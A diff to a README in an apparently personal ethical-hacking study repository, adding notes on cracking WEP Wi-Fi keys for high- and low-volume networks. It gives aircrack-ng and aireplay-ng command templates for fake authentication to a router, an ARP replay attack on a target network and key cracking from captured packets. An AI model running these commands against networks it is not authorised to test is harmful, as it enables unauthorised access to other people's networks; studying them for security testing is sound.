NickHerrig/ethical-hacking/README.md

 ### Cracking  and Connecting to a WEP Wifi Network

+##### High Volume WEP Wifi Network Cracking
-- In order to crack a WEP, we need a large ammount of packets or a high volume network.
+- In order to crack a WEP, we need a large ammount of packets from a high volume network.

-- run aircrack-ng with the .cap file to crack the key
+- Run aircrack-ng with the .cap file to crack the key

    `aircrack-ng <name of .cap file>`

+##### Low Volume WEP Wifi Network Cracking
+- Utilize airodump-ng to sniff packets on the victum network as seen above.

+- To associate your device to the network utilize aireplay-ng by running the command

+   `aireplay-ng --fakeauth 0 -a <Router MAC> -h <Your Device unspec> <device name>`

+- Run an ARP Attack on the network by running the command `aireplay-ng --arpreplay -b <Router MAC> -h <Your Device unspec> <device name>`

+- Run aircrackpng with the .cap file similar to above to crack the key
 ___